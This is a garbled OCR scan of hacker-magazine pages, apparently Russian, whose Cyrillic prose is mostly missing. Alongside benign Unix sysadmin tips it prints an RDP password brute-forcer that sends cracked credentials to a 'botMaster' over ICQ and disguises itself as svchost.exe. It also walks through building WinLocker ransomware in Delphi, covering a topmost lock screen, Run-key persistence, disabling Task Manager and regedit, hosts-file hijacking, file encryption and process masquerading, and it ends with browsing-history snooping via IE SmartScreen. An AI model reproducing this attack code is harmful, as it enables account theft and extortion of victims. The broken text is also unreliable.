--daemon --user distcc -P /var/run/distccd.pid"

,
( , ). '--allow' ,
. :
$ sudo /usr/local/etc/rc.d/distccd start

. /etc/make.conf
:
# vi /etc/make.conf
# distcc
CC = distcc
CXX = distcc
#
MAKE_ARGS =- j8

distcc CC CXX,
X 05 /136/ 10

,
gcc g++:
#
#
#
#
#
#

mkdir -p /usr/local/lib/distcc/bin
cd /usr/local/lib/distcc/bin
ln -s /usr/local/bin/distcc gcc
ln -s /usr/local/bin/distcc g++
ln -s /usr/local/bin/distcc cc
ln -s /usr/local/bin/distcc c++

/root/.cshrc
:

. - ssh
distcc, :
# ssh-keygen -t dsa -f /etc/distcc/.ssh/id_dsa

(id_dsa.pub)
/etc/distcc/.ssh/authorized_keys , .
ssh portage , . - :
# chown -R distcc:daemon /etc/distcc
# chmod 644 /etc/distcc/.ssh/authorized_keys

setenv PATH /usr/local/lib/distcc/bin:$PATH

:
DISTCC_HOST, distcc-:
setenv DISTCC_HOSTS "127.0.0.1 192.168.1.2
192.168.1.3 192.168.1.4"

, - .
distcc distccmon-text. ,
distcc. , distccmontext N, N
. Gnome ( )
distccmon-gnome.
distcc.
Gentoo ,
-. FreeBSD
, distcc,
distcc, CC CXX /etc/make.conf /usr/local/
lib/distcc/bin .


distcc ,
,
,
, . VPN,
,
SSH-.

Gentoo,
/.
distcc.
,
. ,
. -,
( /etc/distcc):
# mkdir -p /etc/distcc/.ssh
# usermod -d /etc/distcc distcc

-, :
# usermod -s /bin/bash distcc

-, :

# chown portage:portage /etc/distcc/.ssh/id_dsa


# chmod 600 /etc/distcc/.ssh/id_dsa
# chmod 644 /etc/distcc/.ssh/id_dsa.pub

emerge ssh
-,
:
# ssh-keyscan -t rsa 1 2 3 \
> /var/tmp/portage/.ssh/known_hosts
# chown portage:portage /var/tmp/portage/.ssh/ \
known_hosts

distcc:
# vi /etc/distcc/distcc-ssh
#!/bin/bash
exec /usr/bin/ssh -i /etc/distcc/.ssh/id_dsa "$@"

:
# chmod a+x /etc/distcc/distcc-ssh

/etc/make.conf:
# vi /etc/make.conf
MAKEOPTS="-j8"
FEATURES="distcc"
DISTCC_SSH="/etc/distcc/distcc-ssh"
DISTCC_HOSTS="localhost/2 distcc@1/3 distcc@
2/5"


, ccache distcc, ,
,
,
. ,
, ,
. ,
ccache gcc distcc-, ,
INSTALL. z

# passwd -u distcc
X 05 /136/ 10

087

UNIXOID
Adept adeptg@gmail.com


Linux

Linux. Distrowatch.com
649 ( ) ,
- . , ,
? ! ,
.

INSTALINUX


, .

.
? , LiveCD
( , ),
.

2 : . , ,
GUI
:).
:

netinstall-
.

SUSE STUDIO ;

RECONSTRUCTOR Debian Ubuntu;

088


:
UBUNTU CUSTOMIZATION KIT GUI-
Ubuntu;
RECONSTRUCTOR ;
REVISOR GUI-
Fedora;
LIVECD-CREATOR CLI-
Fedora.

SUSE STUDIO Novell,


.

(
LiveCD/LiveUSB) -


(
).
Suse Studio
(,
). OpenID Google, Yahoo Novell.

15 .

4 :
1. .
OpenSuse
11.2, SUSE Linux Enterprise 10 SUSE Linux
Enterprise 11 32-, 64-
. DE
Gnome, KDE IceWM,
.
2. ,
. ,
X 05 /136/ 10

WARNING

warning

.
,
!


.
RPM. OpenSuse 8000
, . ,
LiveCD, .
3. .
:
, , ,
runlevel, ( MySQL
PostgreSQL),
, ,
, .
.
4. , (LiveCD, HDD/
Flash ) .
.
, ,

( Testdrive).
KVM. -
2 /.

ssh vnc. , :).
Modified Files,
. , Suse Studio
, , , ,
.

4000 . (,
)
. , must use Suse!

UBUNTU:
Reconstructor, , Debian Ubuntu. -
$5,
.
,
(, $0,3), $5
. ,
PayPal.

(
Debian 5, Ubuntu 9.04 9.10 x86
x86-64), DE (Gnome, KDE, Xfce Text Only)
(LiveCD ).
, ( , X 05 /136/ 10

HTTP://WWW
Reconstructor.
). ,
,
.
,
, .
:
APT REPOSITORY UBUNTU PPA REPOSITORY
. ,

, Post Script;
INSTALL DEB PACKAGE deb;
SYSTEM UPGRADE ;
PRESEED Preseed-;
INSTALL FILE
;
: , , , Firefox ..
, , ( Build Project
). ,
(
)
. 10 .
, .
, Reconstructor
GPLv3,
.
, Reconstructor ,
, .
,
,
.

, www.
reconstructor.org/projects/reconstructor/files.
:
RECONSTRUCTOR ENGINE , -;
RECONSTRUCTOR ,
, -,

links
Suse Studio:
http://susestudio.com
Reconstructor:
https://reconstructor.
org
Instalinux:
www.instalinux.com
Ubuntu customization
Ubuntu
customization kit:
http://uck.
sourceforge.net
Revisor:
http://revisor.
fedoraunity.org
Calculate Linux
Scratch:
http://www.calculatelinux.org
Fedora.
! :)
http://spins.
fedoraproject.org
, , , ,
,

http://citkit.
ru/articles/1442/.

089

UNIXOID

SuseStudio

Revisor
. ,
, ,
.
-,

. ,
chroot- , .
chroot (,
,
). , -,

Bash,
.
:
Windows- (Firefox, Thunderbird
..)
.


,
, , Instalinux
. -,

! -,
: CentOS, Debian, Fedora,

OpenSUSE, Scientific, Ubuntu. , ,


-, LiveCD/, netinstall-,
. 6
. ,
(
,
).
, .
(
), ( ).

( Ubuntu)
.
ISO.
.
, Ubuntu Xfce
12 , Fedora 12 LXDE -
227 ( , , , ).
30 /,
. ISO,

Preseed, Kickstart AutoYaST. , Install

, .
, (
- ). Debian
preseed, Fedora (Red Hat, CentOS ..) kickstart, OpenSuse AutoYaST.
:
http://wiki.debian.org/DebianInstaller/Preseed
http://fedoraproject.org/wiki/Anaconda/Kickstart
http://en.opensuse.org/AutoYaST

090

, .
Instalinux
,
Preseed/Kickstart/AutoYaST .
, . ,
.
! , CentOS (
). ,

:
CentOS
.


*BUNTU!
Ubuntu customization kit . jaunty
.

.
5 .
:
,
LiveCD, ;
DE (: kde, gnome, others).

DE;
ISO Ubuntu (Kubuntu, Xubuntu,
etc);
CD;
?
!
;
Windows- CD?
chroot
Synaptic,
.
main restricted,
.
, Synaptic, SettingsRepositories,
universe multiverse .
(, LiveCD)
chroot.
: exit,

.
,
Continue building.
X 05 /136/ 10

SuseStudio TestDrive

Ubuntu customization kit


10.


, Fedora,
. GUI-
Revisor Livecd-creator CLI-. Revisor
UCK Reconstructor Fedora.
, ,
LiveCD,
.
Revisor Fedora,
,
:
# yum install revisor

Revisor, Livecd-creator
SELinux :
# setenforce 0

Revisor .
(CD/DVD
/ LiveCD).
. : /etc/revisor/revisor.conf
( ,
Fedora). ,
. , Revisor Fedora 12
Fedora 12 Fedora Rawhide
x86, x86-64 PPC. ,
Revisor , , Fedora 11
Fedora 13. kickstart-
, .
. :
,
(,
- ). , Revisor, , , (
2007).
( , ,
). , ,
, , SELinux, X Window
. Revisor
.

. Livecd-creator ,
.
LiveCD, ,
kickstart.
livecd-creator ( livecd-tools):
X 05 /136/ 10

# yum install livecd-tools spin-kickstarts


l10n-kickstarts

,
.
/usr/share/spin-kickstarts. LiveCD
:
# livecd-creator --config=/usr/share/
spin-kickstarts/fedora-livecd-desktop.ks
--fslabel=Fedora-LiveCD --cache=/var/cache/
live

INFO

info
PPA (Personal
Packages Archive)


Ubuntu, http://
launchpad.net Canonical.

USERFRIENDLY GENTOO
Gentoo,
.
Calculate Linux
Scratch (CLS). CLS Gentoo
,
LiveCD/LiveUSB. OpenBox,
Gnome (CLSG). CLS,
LiveCD Builder. Live-,
.
,
:
# cl-builder


chroot /mnt/builder,
. , , -
.
, ( exit
<Ctrl+D>) Live-.
, LiveCD:
# calculate --iso

/usr/calculate/share/linux.
, ,

- - rw-.

HAPPY END

:
. ,
, Linux from
Scratch... z

091

UNIXOID
zobni n@gmail.com

UNIX- , ,
.
,
. .
HTTP-

HTTP-, , .
, netcat 80-
PostScript, .

HTTP- bash 222
(http://alexey.sveshnikov.ru/blog/2006/12/23/
http----222-/).
UNIX- nc,
:
server$ nc -l -p 8080 < file
client$ x-www-browser
http://192.168.0.1:8080

HTTP-,

092


.
,
google chrome
,
:
$ while true; do nc -vv -l -p 8080 -c
'( read a b c; file=`echo $b | sed 's/
[^a-zA-Z0-9.]//g'`; if [ a$file = "a"
]; then ls -l; else cat $file; fi )';
sleep 1; done

.
,
.

.
,
HTTP- (
MIME-),
404

index.html. , ,
.
HTTP- Martin A. Godisch.

- bash
awk, PostScript,
Adobe Systems

.
, ,
, http://
people.debian.org/~godisch/pshttpd
.


CUPS
CUPS,
UNIX-,
,

X 05 /136/ 10

cwget-
,
.
,
, CUPS

. CUPS
:
1. cwget.sh,

CUPS-:
$ sudo vi /usr/local/sbin/cwget.sh
#!/bin/sh
DOWNLOAD_DIR=$1
cd
mkdir -p "$DOWNLOAD_DIR"
cd "$DOWNLOAD_DIR"
/usr/bin/wget -nc -i "$2" >/dev/null 2>&1

:
$ sudo chmod +x /usr/local/sbin/cwget.sh

2. CUPS-,
URL
:
$ sudo vi /usr/lib/cups/backend/cwget
!/bin/sh
if [ $# -eq 0 ]; then
echo 'cups wget "Unknown" "Cups wget
downloader"'
exit 0
fi
#
DOWNLOAD_DIR=/var/tmp
umask 0
TMPFILE=/tmp/cwget$$
cat "$6" > $TMPFILE
/bin/chmod +r $TMPFILE
/usr/bin/sudo -H -u $2 /usr/local/sbin/cwget.
sh "$DOWNLOAD_DIR" "$TMPFILE"
rm /tmp/cwget$$

:
$ sudo chmod +x /usr/lib/cups/backend/cwget

3. sudo
X 05 /136/ 10

aucat(1)
cwget.sh ,
lp,
CUPS-, :
$ sudo visudo
lp
ALL=(ALL) NOPASSWD:/usr/local/sbin/
cwget.sh

4. web-,
cwget ( cwget-)
,
(
).
5. , (URL)
. , , :
$ echo 'http://kernel.org/pub/linux/kernel/
v2.6/linux-2.6.33.tar.bz2' | lpr -Ppcwget

HTTP://WWW
links
bash:
http://slashdot.org/
articles/01/02/
15/046242.shtml

mp3-:
www.xakep.
ru/magazine/
xa/062/110/1.asp

OPENBSD
Open' aucat, .au,

, ,

, ,
aucat.
OpenBSD-
, -
. , , :
1. aucat
. , aucat UNIX-,
(), ().
2. aucat
aucat,
ssh. ,
aucat UNIX-, aucat- ,
aucat- UNIX-
aucat-.
.
3. 2 , .

INFO

info
PostScript
.



.

093

UNIXOID

:
user1@host1> aucat -l
user1@host1> aucat -o user1@host2 aucat -i
user2@host2> aucat -l
user2@host2> aucat -o user2@host1 aucat -i

| ssh \
| ssh \
-


. ,
, aucat UNIX (
/tmp/aucat-ID-/default),
aucat
, ID
.
, aucat
.
aucat,
host2 ssh,
user1,

user2,
. ,
ID
,

/tmp/aucat-ID-
.
:
u1@h1> user1_UID='id -ur user1'
u1@h1> user2_UID=`id -ur user2'
u1@h1> aucat -l; cd /tmp/
u1@h1> chmod 755 aucat-$user1_UID
u1@h1> ln -s aucat-$user1_UID aucat$user2_UID
u2@h2> user2_UID='id -ur user2'
u2@h2> user1_UID=`id -ur user1'
u2@h2> aucat -l; cd /tmp/
u2@h2> chmod 755 aucat-$user2_UID
u2@h2> ln -s aucat-$user2_UID aucat$user1_UID


,

. Linux
,
VESA,
-.
Memory
Technology Device (MTD), ,
,
PCI. ,
. , , make
menuconfig, Device Drivers
:
$ sudo make menuconfig
Device Drivers --->
<M> Memory Technology Device (MTD)
support --->
<M> Direct char device access to
MTD devices
<M> Common interface to block
layer for MTD 'translation layers
<M> Caching block device access
to MTD devices
Self-contained MTD device
drivers --->
<M> Physical system RAM


PCI.
lspci :
$ lspci | grep VGA

:
. ,
,


11000 :

02:00.0 VGA compatible controller:


nVidia Corporation NV35 [GeForce FX
5900XT] (rev a1)

:
$ lspci -vvv -s 02:00.0

user1@host1> aucat -b 1 -r 11000 -o - \


| ssh user1@host2 aucat -b 1 \
-r 11000 -i -

094

,
prefetcheble.

SED

SED
, (
),
3D-. , ,
,
2D-
( ,
), 3D
. ,
,
, ,
.
1024x768@32 1024 * 768
* 4 = 3145728 (32 = 4 ) 3 .
, , ,
, ,
,
, ( ).

lspci prefetcheble- .
Memory at
e0000000.
8
X 05 /136/ 10

800000.
e0800000. phram,
( 128 , 8 120 ):
$ sudo modprobe phram phram=VRAM,0xe0800000,120Mi

MTD:

prefetchable- lspci

$ cat /proc/mtd

,
. , mtdblock, /dev/mtd0
/dev/mtdblock0:
$ sudo modprobe mtdblock

, :
$ sudo mkswap /dev/mtdblock0
$ sudo swapon /dev/mtdblock0

:
$ sudo mkfs.ext2 /dev/mtdblock0

, /etc/X11/xorg.conf
Device Driver "vesa".

,

SED (Stream EDitor), UNIX
,
,
,
. ,
UNIX- ,
, SED
- (http://uuner.livejournal.com/55238.html). ,
, , ,
.
, , (http://sed.sourceforge.net) 11 ,
, . ,
Apache, SED- web-.

JABBER SSH
SSH-
. ,
22- ,
NAT. , , jabber-,
jabber-,
.
, , ,
. ,
www.ylsoftware.com. ,
.
, :
$ wget ylsoftware.com/jabber-shell-20090303.tar.bz2
X 05 /136/ 10

$ tar -xjf jabber-shell-20090303.tar.bz2


$ vi ~/.jabber-shell
(
#
'server' => 'jabber.ru',
'port'
=> '5222',
# ,
'username' => 'jabber-shell',
'password' => 'password',
#
'resource' => 'jabber-shell',
# JID
'admins' => 'admin1@host.com admin2@host.ru',
)

JID' (
) , admins.
perl, libnet-xmppperl libnet-jabber-perl :
$ ./jabber-shell.pl &

WEB-
www.youtube.com/watch?v=LG
HItQK2fA8&feature=player_embedded, ,
python-, ,
web-. ,
.
cmake, python, python-xlib,

OpenCV (http://opencv.sf.net). , :
$
$
$
$

tar -xjf OpenCV-2.0.0.tar.bz2


cd OpenCV-2.0.0
mkdir release; cd release
cmake -D CMAKE_BUILD_TYPE=RELEASE \
-D CMAKE_INSTALL_PREFIX=/usr/local \
-D BUILD_PYTHON_SUPPORT=ON ..
$ sudo make install

cam-mouse-ctrl.py,
, .

?
, .
, ,
( :).z

095

CODING
RankoR, rankor777@gmail.com, ax-soft.ru


-

RDP-

,
. tss-brute metal ActiveX-based ,
Dizz .
- tss-brute (RDP Brute by Dizz) R&D P Brute.
Windows. , !

, , - ,
.
metala ( ).
, mstsc.
exe.
ActiveX-based ActiveX
.
, ,
, n ,
n .
(
, !). ,
Windows
Server 2003, .

096

, , ,
Windows NT,

RDP 5!

2009 . RDP, , ,
. , ,
rdesktop RDP- , X-
.
. - ,
. ,
.
, ,
X 05 /136/ 10

>> coding

HTTP://WWW
links
forum.asechka.ru

ICQ
ax-soft.ru


qt.nokia.com Qt

WARNING
warning

Qt Creator
, rdesktop . , , ,
- ! , , ,
.
. pudn.
com winRDesktop rdesktopa Windows,
MS Visual Studio. ,
, .
,
. ,
:
1. winrdesktop,
, IP .
.
2. GUI -, :
, IP, ICQ-. GUI
C++ Qt.
,
,
ICQ Delphi/BCB?
Qt- QOSCAR ICQ
(, , ),
qoscar.googlecode.com.
, , ( ) .
, , !

DEVELOPERS, DEVELOPERS, DEVELOPERS!


WinRDesktopa. ,
, ,
"PUDN". , Rdesktop
. - Rdesktop! . Visual Studio 2008
( VC++ 2008 Express, Professional
, X 05 /136/ 10

, ,
DreamsPark,
. VC 9,
VS2008
.

rdesktop.h,
. ,
Win 2k, , ,
. , Win 2000
.
? ,
/ . ,
#define LOGON_AUTH_FAILED\xfe\x00\x00 ,
.
.
.
, ? :)
process_text2()
orders.c. - . , ,
PDU_LOGON.
:
process_text2()
if (!memcmp(os->text, LOGON_AUTH_FAILED, 3))
ExitProcess(2);



.
,
,

.

DVD
dvd

INFO

info

RDP Qt
,

RDesktop Qt

if((!memcmp(os->text, LOGON_MESSAGE_FAILED_
XP, 18)) || (!memcmp(os->text,LOGON_MESSAGE_
FAILED_2K3, 18)))
ExitProcess(3);

.
.

097

CODING

winRDesktop Visual Studio 2008

rocess_text2() , ( ),

logone. rdp.c process_
data_pdu(). , case
RDP_DATA_PDU_LOGON:. ExitProcess(4) .
ExitProcess() .
, winRdesktopa .
, .
.
, . ,
ShowWindow SW_HIDE.
,
? Printf()
, .

ExitCode.
, ExitProcess(4) ,
ExitProcess(2) , ExitProcess(3)
. ( process_text2() ).
, . , , 30
100% MSI Wind u90. (RDP- ). (
)
( , ?),
,
. ,
, :).
, , - , .
, , ,
:).

, , ,
metala. , , ,
, ,
-.
, C#,
( , ) Qt
Framework. ][ ,
. ,
.
Qt qt.nokia.com
( Qt Software,

098

,
).
Qt Creator ( snapshot
, stable-, ,
). , GUI-
. ,
. .
.
1. .
2. .exe-,
, .
3. , , ,
, 2.
BruteThread, ,
, , QThread,
,
. BruteThread winRDesktopa
process QProcess. QProcess
, ,
(, printf cout, ), .

, void started() void finished(int
exitCode) .
,
.
,
onFinished().
, ;.
:

QStringList slArgs;
slArgs << "-u" << slLogins.at(iCurrentLogin)
<< "-p" << slPasswords.at(iCurrentPassword)
<< sServer;
process.start(svchost.exe, slArgs);
iCurrentPassword++;

, QStringList,
:).
, ,
:
QObject::connect(&process, SIGNAL(finished(int)),
this, SLOT(onFinished(int)));

, :
metal aka DeX C/C++,
, !
.fry OSCAR,
forum.asechka.ru .
:
xo0x.art, vitalikis,
Sundagy /C++,
Miracle :),
, , :).

X 05 /136/ 10

>> coding

onFinished()
if ( exitCode > 666 )
{
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
exitCode);
emit onDoneServer(this);
return;

onServerResult() Qt Creator

, :

}
switch ( exitCode )
{
case 666: //
emit onDoneServer(this);
return;


if ( iResult == 0 )
{
iGood++;
iChecked++;

case 0: //
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
true);

writeResult(QString("%1:%2;%3").arg(sServer
).arg(sUser).arg(sPassword), "good.txt");

if ( bSkipZero )
{
emit onDoneServer(this);
return;
}
break;

oscar.sendMessage(settings.botMaster(),
QString("%1:%2;%3").arg(sServer).arg(sUser)
.arg(sPassword));
if ( trayIcon.isVisible() )
trayIcon.showMessage("Good",
QString("%1:%2;%3").arg(sServer).arg(
sUser).arg(sPassword));
}
else
if ( iResult == -1 )
{
iBad++;
iChecked++;
}

case 4: // !
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
0);
emit onDoneServer(this);
return;
case 5: //
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
0);

DONE!

! ,
. ,
,
, , , -,
. , , ,
, :).

R&D P Brute, , (
!), (
mstscax.dll, ??, ShowMessage()???).
, , , brain.dll hands.lib
( sslBot , ). ,
.
,
:
1) .
2) ( , ).
. !z
X 05 /136/ 10

emit onDoneServer(this);
return;
default: //
emit onServerResult(sServer,
slLogins.at(iCurrentLogin),
slPasswords.at(iCurrentPassword-1),
-1);
break;
}
nextPassword();

099

T OJAN.WINLO
TR
OCK
K
var
CODING
Spider_NET

disk:DWORD;
begin
case Msg.WPara m of
DBT _ DEVICEARRIVAL:
if (PDEV _ BROADCAST //
.dbch _ devicetype _ HDR(Msg.LParam)^
= DBT _ DEVTYP _ VOLUME
) then


TROJAN.WINLOCK

,
,
, , .
?
, 10% . ,
,
:
, Windows.
?

( ,

). ,
. .
:
1. . ,
.
web- , ,
, . , (
).

?.
: -

100

. ,
. security-, (
) .
, .
2. FLASH. Adobe .
flash-,
. ,
, .
,
, .

. ,

.
3. .
,
X 05 /136/ 10

>> coding

WINDOWS API
wc.cbSize:=sizeof(wc);
wc.style:=cs_hredraw or cs_vredraw;
wc.lpfnWndProc:=@WindowProc;
wc.cbClsExtra:=0;
wc.cbWndExtra:=0;
wc.hInstance:=HInstance;
wc.hIcon:=LoadIcon(0,idi_application);
wc.hCursor:=LoadCursor(0,idc_arrow);
wc.hbrBackground:=COLOR_BTNFACE+1;
wc.lpszMenuName:=nil;
wc.lpszClassName:=win_main;
RegisterClassEx(wc);
leftPos:=20;
topPos:=0;
windowWidth:=Screen.Width;
WindowHeight:=Screen.Height;
MainWnd:=CreateWindowEx(
0,
win_main,
test,
ws_overlappedwindow,
leftPos,
topPos,
windowWidth,
windowHeight,
0,
0,
Hinstance,
nil
);

msdn

WINAPI
var
Key: HKey;
begin
//
.
RegOpenKey(HKEY_LOCAL_MACHINE,
PChar(), Key);

SetWindowLong(MainWnd, GWL_HWNDPARENT,
GetDesktopWindow);

RegSetValueEx(Key,PChar(paramstr(0)),
0, REG_SZ,
pchar(paramstr(0)),
lstrlen(pchar(paramstr(0)))+1);

SetWindowPos(MainWnd, HWND_TOPMOST,
0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);

RegCloseKey(Key);
end;

ShowWindow(MainWnd, CmdShow);
While GetMessage(Mesg,0,0,0) do
begin
TranslateMessage(Mesg);
DispatchMessage(Mesg);
end;

.
,
Winlocker, flash- .
, , , .

, ,
Delphi. exe
!, . , .
API. ,
X 05 /136/ 10

WARNING
warning

-
.


,



.

.

100 .
- .

WINLOCKER

Winlockera ,
. ,
,
. ,
, . ,
-,
. , ,
.

,
.

WM_SYSCOMMAND. ,

101

RD;
begin
case Msg.WPara m of
DBT _ DEVICEARRIVAL:
if (PDEV _ BROADCAST //
.dbch _ devicetype _ HDR(
= DBT _

CODING


(. ) WM_SYSCOMMAND. ,

.

.
. : . ,
,
. , :
1. HKLM\Software\Microsoft\Windows\CurrentVersion\Run
, .
2. HKCU\Software\Microsoft\Windows\Current\Version\Run ,
, ,
.
3. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
, .
4. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\
Run ,
.
5. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows
, ,
Windows.
6. KHLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
, .
7. . , ,
, .

102

? ,
- .
, . WinAPI
.


var
disk:DWORD;
begin
case Msg.WParam of
DBT_DEVICEARRIVAL: //
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//
disk := PDEV_BROADAST_VOLUME(Msg.LParam" ")^
.dbcv_unitmask;
//
end;
DBT_DEVICEREMOVECOMPLETE: //
if (PDEV_BROADCAST_HDR(Msg.LParam)^
.dbch_devicetype = DBT_DEVTYP_VOLUME) then
begin
//
end;

X 05 /136/ 10

//
_ HDR(Msg.LParam)^
DBT _ DEVTYP _ VOLUME
) then

>> coding

WEB-
var
_buff: array [0..1024] of char;
_request:string;
_temp: string;
_path: string;
_FileStream : TFileStream;
begin
Recv(_client, _buff, 1024, 0);
_request:=string(_buff);
_path := GetFilePath (Copy
(_request, 1, pos(#13, _request)));
_path := ReplaceSlash(_path);
if ((_path = '') or (_path = '\')) Then
_path := DocumentRoot + '\' + DirectoryIndex;
{ else
if ((_path[length(_path)] ='\')) Then
_path := DocumentRoot + '\' +
DirectoryIndex; }
if (FileExists(_Path)) Then
begin
_FileStream :=
TFileStream.Create(_Path, fmOpenRead);
SendStr(_Client, 'HTTP/1.0 200 OK');
SendStr(_Client, 'Server: xSrV');
SendStr(_Client, 'Content-Length:' +
IntToStr(_FileStream.Size));
SendStr(_Client, 'Content-Type: '
+ GetTypeContent(_Path));
SendStr(_Client, 'Connection: close');
SendStr(_Client, '');
SendFile(_Client, _FileStream);
_FileStream.Free;
End
//

, !

.
, .
. . Windows (, Pro
) gpedit.
.
, ,
X 05 /136/ 10

. , , .
, ,
. ? :
, ProcessMonitor
. ,
.


Windows regedit.
,
.
.
. , DisableRegistryTools 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System.

, ,
. , .
DisableTaskMgr ( dword) 1
, DisableRegistryTools.

. ,
NoAddRemovePrograms 1 ( dword) , DisableRegistryTools.

,

.
!
NoViewOnDrive (dword) HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
. , C 4. ,
,
. , 12 C (4) D (8).

103

CODING

begin
case Msg.WPara m of
DBT _ DEVICEARRIVAL:
if (PDEV _ BROADCAST //
.dbch _ devicetype _ HDR(Msg.LParam)^
= DBT _ DEVTYP _ VOLUME
) then

1:


. ,
, . : HKEY_CURRENT_
USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\
RistrictRun. ( REG_SZ)
,
RestrictRun dword
1.

,
.
,

.
NoManageMyComputerVerb dword 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer.

, (, ).

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services.
start.
,
, start 3. ,
, .

.

Winlocker ,
, .
, ,
. ,
,
.
: , ,
skype .. -
, .
, , .

104

? ! , ,
.
, ,
. ?
. ,
. . ,
WM_DEVICECHANGE. 3.
,
, Delphi.
.
MSDN, ,
DVD.

2: !

web- ?
, :
, , , facebook, twitter, etc.
. ?
, ,
. , . ,
,
. , ,

.
. ,
. , ,
.
, ? ,
.

. .
hosts.

:ip.
web-.
?.
evil-,
. , .
,
web.
localhost.
: 127.0.0.1 www.odnoclassniki.ru
hosts ,
, Delphi WEB-.
, Winsock API. (FTP, PROXY,
IRC ..) api-.

( . .). ? !
, ., ,
evil-. , web-
(
, ). :
, web-
X 05 /136/ 10

>> coding

then

Key: TWordTriple): boolean;


//
function MemoryDecrypt(Src: Pointer;
SrcSize: Cardinal; Target: Pointer;
TargetSize: Cardinal; Key: TWordTriple): boolean;

,
.

4: !

ProcessMonitor
. ,
,
. ,
, .

3:

-
SMS? -. ,
. ?
, / , :
(doc, xls, mdb, ppt, txt), (jpeg, png, bmp),
(php, pas, c, h, cpp, dpr, py ..).
- ,
,
.
.
FindFirs() FindNext()
Sysutils. , .
,
: FindFirstFile() FindNextFile().
(.
), .
Delphi
. . ,
torry.net . ,
Delphi. :
//
function FileEncrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//
function FileDecrypt(InFile, OutFile: String;
Key: TWordTriple): boolean;
//
function TextEncrypt(const s: string;
Key: TWordTriple): string;
//
function TextDecrypt(const s: string;
Key: TWordTriple): string;
// ""
function MemoryEncrypt(Src: Pointer; SrcSize:
Cardinal;
Target: Pointer; TargetSize: Cardinal;
X 05 /136/ 10


.
. ( ), , winlocker -. :
. ,
. .

. , .
joiner . , (. #104)
.

5:

, Winlocker
.
, ,
. :
system.exe, user32.exe, csrss.exe, eplorer.exe .
, , ,
.
,
:
1. .
, .
2. . , API .
API. !
3. .

6:


.
,
. ,
, ,
.

WORK COMPLETE

WinLocker
. -

, .
Winlockera. ,
.
? ! ,

, . ,
. , . , ,
. ,
,
:). z

105

CODING
presidentua , http://tutamc.com

INPRIVATE

IE8
, Microsoft. , ,

. , ,
,
, , .
SMARTSCREEN


SmartScreen Internet Exlorer, -

SAFE BROWSING GOOGLE


. http://safebrowsing.clients.google.com/
Chrome FireFox md5 url. md5 , , , md5
. , . API.
, .
http://code.google.com.

106

. SmartScreen
urs.
microsoft.com :
POST /urs.asmx?MSPRU-Client-Key=l7m7EvM2K/
IVNQCBF7AVPg%3d%3d&MSPRU-Patented-Lock=XdXWSI8WgDg%3d
HTTP/1.1
Host: urs.microsoft.com
<soap:Envelope ...><soap:Body><Lookup xmlns="http://
Microsoft.STS.STSWeb/"><r soapenc:arrayType="xsd
:string[1]"><string>http://tutamc.com</string></
r><ID>{B3BB5BBA-E7D5-40AB-A041-A5B1C0B26C8F}</
ID><v soapenc:arrayType="xsd:string[5]"><strin
g>7.0.6004.6</string><string>7.00.5824.16386</
string><string>7.0.6000.16386</
string><string>6.0.6000.0.0</string><string>enX 05 /136/ 10

>> coding

SmartScreen

IE

us</string></v></Lookup></soap:Body></
soap:Envelope>

IE URL , , , ,
, IP-. . -
, -,
. - , -
IP- . ,

, ,
: ,
, . , SmartScreen, ,
.
:), ,
X 05 /136/ 10

. , ,
.
URL
Opera. ! ,

. ,
Chrome FireFox.
IE 8 -
(InPrivate Browsing), .
,
.
, -. -,
, IE
. , - SmartScreen
,
.
, .
IE
. urs.
microsoft.com. ,
. , . -? (
, ) .
! InPrivat !

, . . .
,
, ,
.

, ? , . , -

DVD
dvd

-
IE



,

HTTP://WWW
links

Safe Browsing
Google
http://code.
google.com/apis/
safebrowsing
Python

http://pywinauto.
openqa.org

107

CODING

FireFox ,
, ,

FireFox


IE

def do_CONNECT(self):
open('d:\\test.txt', 'w+').close()
#

, IE , , - test.txt. ,
, :

,

,
.

URL. , IE,
:
C:\Documents and Settings\admin\Local Settings\Temporary Internet
Files\AntiPhishing\2CEDBFBC-DBA8-43AA-B1FD-CC8E6316E3E2.dat
( XP).
, IE
.
, , ,
, . .
, ?
Socks-,
-,
, urs.microsoft.com, .
, , , ,
, ,
!

, , , PYTHON!

- , .
TinyHTTPProxy, , ,
Pythone. do_CONNECT,
HTTPS-. IE ,
urs.microsoft.com.

, -,
.
, , .

108

urls = (
'http://not_porn1.com/',
'http://super_puper_porn1.com/',
)
for url in urls:
time.sleep(1)
try:
os.remove('d:\\test.txt')
except: pass
test_url(url)
if not os.path.exists('d:\\test.txt'):
print "U were on this site: %s"%url

test_url, IE
URL. , ,
, Python IE ,
IE (
), IE.
pywinauto (http://pywinauto.
openqa.org), WinAPI. IE:
prog_ie = r"C:\Program Files\Internet Explorer\
iexplore.exe"
application.Application.start("%s %s"%(prog_ie,url.
decode(utf-8)))

WinAPI,
:
import win32gui
import win32con
def window_enumeration_handler_ie(hwnd, resultList):
if string.find(win32gui.GetWindowText(hwnd), \
"Internet Explorer") != -1:
resultList.append(hwnd)
else:
None
def close_program_ie():
ie_windows = []
win32gui.EnumWindows(window_enumeration_handler_ie,
X 05 /136/ 10

>> coding

IE

Google Safe Browsing


prog_ie = r"C:\Program Files\Internet Explorer\
iexplore.exe"
application.Application.start("%s %s" %
(prog_ie,url.decode('utf-8')))
time.sleep(5)
close_program_ie()
time.sleep(2)

ILDASM

ie_windows)
for i in ie_windows:
win32gui.SendMessage(i,win32con.WM_CLOSE,0,0)

window_enumeration_handler_ie title, IE, .


close_program_ie,
WinAPI EnumWindows
